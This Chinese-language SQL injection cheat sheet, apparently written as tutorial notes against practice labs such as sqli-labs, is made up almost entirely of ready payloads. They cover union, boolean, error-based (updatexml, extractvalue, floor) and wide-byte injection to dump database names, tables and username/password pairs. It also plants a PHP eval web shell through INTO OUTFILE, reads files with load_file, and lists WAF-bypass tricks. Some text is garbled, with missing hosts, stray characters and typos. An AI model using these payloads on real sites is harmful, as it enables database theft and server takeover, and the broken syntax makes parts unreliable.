在 Web 端大概是 http:///news.php?id=1 这种形式,其注入点 id 类型为数字,所以叫数字型注入点。这一类的 SQL 语句原型大概为select * from 表名 where id=1。组合出来的sql注入语句为:select * from news where id=1 and 1=1
字符型注入点
在 Web 端大概是 http:///news.php?name=admin 这种形式,其注入点 name 类型为字符类型,所以叫字符型注入点。这一类的 SQL 语句原型大概为select * from 表名 where name='admin’。注意多了引号。组合出来的sql注入语句为:select * from news where chr='admin’ and 1=1 ’ ’ 闭合单引号chr='admin’ union select 1,2,3,4 and '1’='1 ====>chr='admin’(闭合前面单引号) union select 1,2,3,4 and '1’='1’
搜索型注入点
这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有“keyword=关键字”,有的不显示在的链接地址里面,而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句,其原形大致为:select * from 表名 where 字段 like '%关键字%’。组合出来的sql注入语句为:select * from news where search like '%测试 %’ and '%1%’=’%1%'测试%’ union select 1,2,3,4 and '%’=’
1.判断注入点 http://www./index.php?id =1’ 报错 http://www./index.php?id =1 and 1=1 正常 http://www./index.php?id =1 and 1=2 不正常
2.判断列数 http://www./index.php?id =1 order by 1
3.判断显示位 http://www./index.php?id =1 and 1=2 union select 1,2,3 http://www./index.php?id =-1 union select 1,2,3
4.获取当前数据库 http://www./index.php?id =1 and 1=2 union select 1,2,database()
5.获取数据库中的表名 http://www./index.php?id =1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’
6.获取数据库的列名 http://www./index.php?id =1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’ and table_schema=’security’
8.获取数据表中的数据 http://www./index.php?id =1 and 1=2 union select 1,2,group_concat(username,’ ’,password) from security.users
布尔注入
Bool注入没有任何报错信息,页面只有正常和不正常两种结果
函数
描述
Length()
返回字符串的长度
Substr(字段名,A,N)
截取字符串
ascii()
返回字符的ascii码
limit(0,1)
从0行开始,向后取1行数据
ord()
函数可以返回单个字符的ASCII码
布尔注入过程 (bool)
1.在参数后添加引号尝试报错,并用and 1=1#和and 1=2#测试报错 ?id=1’ and 1=1# 页面返回正常 ?id=1’ and 1=2# 页面返回不正常
2.判断数据库名的长度 1’ and length(database())>=11– 页面返回正常 1’ and length(database())>=13– 页面返回正常 1’ and length(database())>=14– 页面返回错误 由此判断得到数据库名的长度是13个字符
1、尝试用单引号报错 2、获取数据库名 and updatexml(1,concat(0x7e,(select database()),0x7e),1)– –0x7e是"~"符号的16进制,在这作为分隔符
3、获取表名 ’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='数据库名’ limit 0,1),0x7e),1)–
4、获取字段名 ’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='数据库名’ and table_name='表名’ limit 0,1),0x7e),1)–
5、取数据 ’ and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)–
1.获取数据库的名字 http://www./index.php?id=1 and extractvalue(1,concat(0x7e,(database())),0)#
2.获取数据表的名字 http://www./index.php?id=1 and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema='security’ limit 0,1)),0)#
3.获取数据表列的名字 http://www./index.php?id=1 and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema='security’ limit 1,1)),0)#
4.获取数据库数据 http://www./index.php?id=1 and extractvalue(1,concat(0x23,(select password from security.users limit 0,1)),1)
floor报错注入的过程 Floor是报错注入的一种方式,主要原因是rand和group by 分组一起使用,rand函数会计算多次导致报错 Floor函数floor(x)返回不大于x的最大整数值floor(1.4)返回1 Rand()返回0-1之间的随机数 --主键重复(duplicate entry) floor() --返回小于等于该值的最大整数 只要是count,rand(),group by 三个连用就会造成这种主键重复报错
1.获取数据库的名字 http://www./index.php?id =1 and (select 1 from (select count(*),concat(database(),floor(rand()*2))x from information_schema.tables group by x)a)
2.获取数据表的名字 http://www./index.php?id =1 and (select 1 from (select count(*),concat((select(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)
3.获取数据表列的名字 http://www./index.php?id =1 and (select 1 from (select count(*),concat((select(columns_name) from information_schema.columns where table_name=’users’ and table_schema=database() limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)
4.获取数据库的数据 http://www./index.php?id =1 and (select 1 from (select count(*),concat((selectusername from cms.user limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)
http://192.168.91.142/sqli/02.php?id=1’ and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3#
后台处理语句:
Select * from user where id=’1\’ and 1=2union select 1,concat_ws(char(32,58,32),user(),database(),version()),3 #
宽字节注入
http://192.168.91.142/sqli/02.php?id=1�’ and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3 #
后台处理语句
Select * from user where id=’1乘’ and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3 #
2.获取数据库的表名
http://192.168.91.142/sqli/02.php?id=1�’ and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’cms’ #
单引号被转义语法错误将数据库名字转换十六进制
http://192.168.91.142/sqli/02.php?id=1�’ and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x6374667377696b69 #
3.获取数据库列名
http://192.168.91.142/sqli/02.php?id=1�’ and 1=2 union select 1,group_concat(columns_name),3 from information_schema.columns where table_name=0x75736572 and table_schema=0x6374667377696b69 #
4.获取数据库数据
http://192.168.91.142/sqli/02.php?id=1�’ and 1=2 union select 1,group_concat(username,0x2a2a2a,password),3 from user#
Addslashes等函数对输入进行过滤,效果?id=’1\’ 单引号被转义,无法闭合,宽字符注入的原理是数据库使用GBK编码,使用�\会组成一个繁体字,导致单引号逃逸,�’ and 1=1 �’ order by 4
1.3此时我们来判断闭合字符输入http://www./sqli/Less-7/?id=1’ and 1=1 #,回显不正常
输入http://www./sqli/Less-7/?id=1’) and 1=1 #,回显不正常
输入http://www./sqli/Less-7/?id=1’)) and 1=1 #,回显正常
输入http://www./sqli/Less-7/?id=1’)) and 1=2 #,回显不正常
1.4这是我们就要利用以上所学知识写入一句话木马文件,我们输入: http://www./sqli/Less-7/?id=1’)) union select 1,'2’,’<?php @eval($_POST[a]);?>’ into outfile 'c:/www/2.php’#,虽然显示报错,但其实我们还是写了进去。
1.6下面进行读取文件,我们输入:http://www./sqli/Less-7/?id=1’)) union select 1,2,load_file(“C:/WWW/2.php”) into outfile 'C:/WWW/3.php’#,虽然报错了,但是我们还是让它读取到了2.php里的内容,然后让它以3.php写入了进去 |
3.换行符
绕过 http://www./index.asp?Id=1
and
1=2
union
select
1,2database()
4.括号绕过 mysql的特性id=1=1 http://www./index.asp?Id=1=(ascii(mid(database() from (1)))=99)
5.反引号`绕过
关键字过滤
6.内联注释/!../绕过 randomcomments.py 使用/**/分割关键字 http://www./index.asp?Id=1 and 1=2/!union//!select/1,2database()
7.大小写饶过 http://www./index.asp?Id=1 and 1=2 union seleCt 1,2,database()
8.双写关键字绕过 http://www./index.asp?Id=1 and 1=2 union seselectlect 1,2,database()
9.双重URL编码绕过 chardoubleencode.py 单次编码charencode.py http://www./index.asp?Id=1 and 1=2 union se%6cect 1,2,database()
10.十六进制编码绕过 http://192.168.91.142/sqli/02.php?id=1�’ and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x6374667377696b69 #
11.unicode编码绕过IIS识别 charunicodeencode.py http://www./News.asp?SortID=1&ItemID=46 and 0 < (select top 1 name from sys.databases)
12.ascii编码绕过单引号被转义的情况 的url编码为+ http://www./News.asp?SortID=1&ItemID=46 and 0 < (select top 1 name from sec.dbo.sysobjects where xtype=’U’ and name not in(char(101) char(105) char(109) char(115) char(95) char(67) char(97) char(115) char(101) char(80) char(114) char(111)))
13.like或in 代替 = equaltolike.py http://www./News.asp?SortID=1 and 1 like 1
14from for绕过逗号 Select substr(database(),1,1) Select substr(database()from 1 for 1)